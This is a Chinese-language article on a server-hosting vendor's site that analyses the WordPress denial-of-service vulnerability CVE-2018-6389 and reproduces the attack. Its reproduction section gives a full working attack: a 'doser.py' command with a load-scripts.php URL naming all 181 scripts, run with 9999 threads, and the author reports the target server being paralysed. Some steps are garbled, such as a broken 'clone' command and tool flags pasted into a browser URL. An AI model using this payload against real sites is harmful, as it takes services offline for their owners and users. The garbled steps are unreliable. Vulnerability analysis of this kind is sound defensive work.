如何解析WordPress Dos漏洞CVE-2018-6389分析
- 来源:香港机房
- 编辑:蜜蜂网络
- 时间:2021-12-25 19:51:54
- 阅读:1719次
这篇文章将为大家详细讲解有关如何解析WordPress Dos漏洞CVE-2018-6389分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
CVE-2018-6389介绍
序列号 | CPU | RAM | HDD | 带宽 | 售价(美元) | 免费试用 |
---|---|---|---|---|---|---|
香港服务器1 | E5-2620 | 32G | 1T HDD | 50M/无限流量 | $196.00 | 立即申请 |
香港服务器2 | E5-2650 | 32G | 1T HDD | 50M/无限流量 | $256.00 | 立即申请 |
香港服务器3 | E5-2680 | 32G | 1T HDD | 50M/无限流量 | $316.00 | 立即申请 |
香港服务器4 | E5-2690 | 32G | 1T HDD | 50M/无限流量 | $336.00 | 立即申请 |
香港服务器5 | E5-2697 | 32G | 1T HDD | 50M/无限流量 | $376.00 | 立即申请 |
香港服务器6 | E5-2620*2 | 32G | 1T HDD | 50M/无限流量 | $376.00 | 立即申请 |
香港服务器7 | E5-2650*2 | 32G | 1T HDD | 50M/无限流量 | $436.00 | 立即申请 |
香港服务器8 | E5-2680*2 | 32G | 1T HDD | 50M/无限流量 | $476.00 | 立即申请 |
香港服务器9 | E5-2690*2 | 32G | 1T HDD | 50M/无限流量 | $556.00 | 立即申请 |
香港服务器10 | E5-2697*2 | 32G | 1T HDD | 50M/无限流量 | $596.00 | 立即申请 |
香港服务器11 | E5-2680v4*2 | 32G | 1T HDD | 50M/无限流量 | $696.00 | 立即申请 |
香港服务器12 | E5-2698v4*2 | 32G | 1T HDD | 50M/无限流量 | $796.00 | 立即申请 |
漏洞点位于load-scripts.php处,该文件是为WordPress管理员设计的,允许将多个JavaScript文件加载到一个请求中,但研究人员注意到可以在登录之前调用该函数来允许任何人调用它,即任何人都可以调用它。通过构造特殊的payload可导致服务器执行181个I/O操作,并发请求的情况下即可达到Dos的效果。
漏洞测试
在某次测试中,我看到某个站点为WordPress架构,它具有以下路径:
https://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core&ver=4.9.1
其中的load-scripts.php文件会从load[]中接收一个参数,其参数值为'jquery-ui-core',其加载请求后,在返回的响应中我收到了'jQuery UI Core'的JS响应模块。
这一看,我就想到了WordPress的DoS通杀漏洞CVE-2018-6389,虽然只是DoS,但也算曾经风靡一时的好洞。其漏洞原因在于,WordPress允许用户通过load-scripts.php文件一次性载入多个JS文件和CSS文件,之后,load-scripts.php会自动加载jquery-ui-core和editor文件并返回文件内容。但是在载入JS 文件的过程中未对文件数量和大小进行限制,攻击者可利用该功能耗尽服务器资源发起拒绝服务攻击。本文将使用VulnSpy的在线实验环境来对漏洞进行复现和测试。
以上链接似乎表明,它可能是提供给用户的JS模块,此外,load[]参数是个数组,那么意味着可能向其提供多个值,以此也就能够在响应中获得多个JS模块了。
由于WordPress采用wp_scripts列表来存放全部181个脚本文件的路径,目的是让管理员或开发人员可在load[]参数中包含特定脚本的路径,根据用户提供的数值来提升性能。wp_scripts列表硬编码在script-loader.php文件里。所以,我想知道如果我向服务器发出请求,要求其向我响应其存储的每一个JS模块,那这样一来单个请求,就可以让服务器执行181次输入/输出(I/O)操作了!那就来试试CVE-2018-6389吧。
我尝试了一下,果然存在!服务器端在2.2秒后响应回了约4MB大小的数据,可见多少对服务器性能造成了一定影响。
漏洞复现
1、在Linux终端输入命令 clonehttps://github.com/WazeHell/CVE-2018-6389.git
2、复制其中的测试脚本,以目标网站为https://example.com/为例,进行以下测试:
python doser.py -g 'https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999
大约发送了2000多个数据包之后,我观察到服务器端已经明显响应吃力了。
3、现在我们在浏览器中访问以下链接:
https://example.com/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999
可见,服务器基本已经瘫痪了,最终会返回一个超时状态提醒,所以测试有效成功。
-
怎么低价购买香港服务器?
11-12
-
为什么要选择香港服务器,香港服务器的优势
11-12
-
香港服务器与新加坡、韩国、美国等地区服务器的比较
06-21
-
探讨新加坡服务器和香港服务器哪个好?如何选择?
06-21
-
美国服务器好还是香港服务器好?
06-21
-
美国服务器好还是香港服务器好?
06-21
-
用香港的服务器域名需要备案吗
02-03
-
远程登录香港服务器提示凭据不工作的解决方法
04-13
-
香港服务器被大陆屏蔽原因及解决方法
04-13
-
美国服务器和香港服务器哪个好
04-13
-
香港站群服务器(特价)
12-23
-
用香港站群服务器做网站优化/SEO需要注意什么?
03-10
-
多IP香港站群服务器首选蜜蜂网络
02-19
-
香港站群服务器哪里的性价比高
02-14
-
香港站群服务器如何选择?购买香港站服务器配置建议
02-04
-
香港站群服务器做SEO可以吗?
02-04
-
香港站群服务器的知识产权细分市场有哪些?
02-04
-
网站排名怎么办?香港站群服务器助你轻松实现!
12-30
-
香港站群服务器5(特价)
12-23
-
香港站群服务器4(特价)
12-23
-
香港服务器与新加坡、韩国、美国等地区服务器的比较
06-21
-
如何选择美国多 IP 站群服务器? 学习如何统筹管理多个站点
06-21
-
美国站群服务器推荐
06-21
-
怎么购买美国服务器?在哪买?
06-21
-
租用美国服务器需要注意哪些问题?
06-21
-
为什么美国服务器做外贸网站比较合适?
06-21
-
为什么跨境电商首选美国服务器 ?
06-21
-
美国服务器好还是香港服务器好?
06-21
-
国内到美国服务器延时高该怎么办?
06-21
-
美国服务器和国内服务器哪个好?美国服务器真的不用备案吗?
06-21